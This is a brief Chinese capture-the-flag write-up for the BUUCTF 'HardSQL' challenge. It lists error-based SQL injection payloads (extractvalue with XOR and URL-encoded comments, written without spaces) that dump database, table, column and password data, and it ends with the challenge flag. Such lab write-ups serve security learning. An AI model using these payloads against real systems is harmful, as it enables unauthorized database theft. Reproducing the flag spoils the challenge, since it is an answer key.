提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
BUUCTF的[极客大挑战 2019]HardSQL 1
一、做题步骤
1.测试
1.测试后发现什么都不行
2.使用报错注入
extractvalue()函数:对XML文档进行查询的函数
updatexml()函数:是更新xml文档的函数
2.爆数据库
'^extractvalue(1,concat(0x7e,(select(database()))))%23
3.爆表名
'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(‘geek’))))%23
4.爆字段
'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’))))%23
5.爆数据
'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23
'^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23
6.获取flag
flag{a3d5b774-530a-427d-b087-a2b83088f6ce}